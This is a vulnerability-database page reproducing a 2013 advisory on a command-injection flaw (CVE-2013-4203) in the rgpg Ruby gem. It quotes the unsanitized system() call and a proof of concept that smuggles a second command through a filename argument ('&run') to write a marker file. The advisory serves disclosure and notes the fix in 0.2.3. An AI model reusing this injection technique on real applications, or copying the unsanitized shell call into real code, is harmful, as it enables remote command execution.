Lucene search

K

Ruby Gem Rgpg 0.2.2 Command Injection

🗓️ 05 Aug 2013 00:00:00Reported by Larry W. CashdollarType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

Rgpg 0.2.2 Ruby Gem Remote Command Injection vulnerability in gpg_helper.r

Show more
Related
Code
ReporterTitlePublishedViews
Family
NVD
CVE-2013-4203
11 Oct 201322:55
nvd
OSV
rgpg Code Injection vulnerability
24 Oct 201718:33
osv
Prion
Code injection
11 Oct 201322:55
prion
Cvelist
CVE-2013-4203
11 Oct 201322:00
cvelist
securityvulns
Security vulnerabilities in different Ruby Gems
12 Aug 201300:00
securityvulns
securityvulns
Rgpg 0.2.2 Ruby Gem Remote Command Injection
12 Aug 201300:00
securityvulns
Github Security Blog
rgpg Code Injection vulnerability
24 Oct 201718:33
github
0day.today
Ruby Gem Rgpg 0.2.2 Command Injection Vulnerability
5 Aug 201300:00
zdt
CVE
CVE-2013-4203
11 Oct 201322:55
cve
RubySec
rgpg Gem for Ruby lib/rgpg/gpg_helper.rb Remote Command Execution
1 Aug 201320:00
rubygems
Rows per page
`Title: Rgpg 0.2.2 Ruby Gem Remote Command Injection  
  
Date: 7/31/2013  
  
Advisory Author: Larry W. Cashdollar, @_larry0  
  
CVE: CVE-2013-4203  
  
Download: https://rubygems.org/gems/rgpg  
  
Description:  
  
"A simple Ruby wrapper around gpg command for file encryption.  
  
rgpg is a simple API for interacting with the gpg tool. It is specifically designed to avoid altering global keyring state by creating temporary public and secret keyrings on the fly for encryption and decryption."  
  
Vulnerability:  
  
The following code snippet does not sanitize user supplied input before passing it to the System () function for execution. If this ApI is used in the context of a rails application remote commands can be injected into the shell.  
  
in lib/rgpg/gpg_helper.rb:  
  
68 begin  
69 outputfile.close  
70 result = system("#{commandline} > #{output_file.path} 2>&1")  
71 ensure  
  
PoC:  
  
  
Our test code:  
larry@sp0rk:~$ cat /bin/run  
#!/bin/sh  
  
echo "Command Injection" > /tmp/rci.txt  
  
irb(main):027:0* Rgpg::GpgHelper.encrypt_file 'mykey.pub', 'myfile.txt', 'myfile.txt.enc&run'  
=> nil  
irb(main):028:0> gpg: keyring `/tmp/gpg-key-ring20130804-2970-1et1k4c' created  
gpg: processing message failed: eof  
  
After above completes:  
  
larry@sp0rk:~$ ls -l /tmp/rci.txt   
-rw-rw-r-- 1 larry larry 18 Aug 4 11:12 /tmp/rci.txt  
larry@sp0rk:~$ cat /tmp/rci.txt   
Command Injection  
larry@sp0rk:~$   
  
  
Author: Notified 8/1/2013.  
  
Fixed: in 0.2.3. 8/1/2013.  
  
Greets to all@DEFCON21.   
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
05 Aug 2013 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.007
25
.json
Report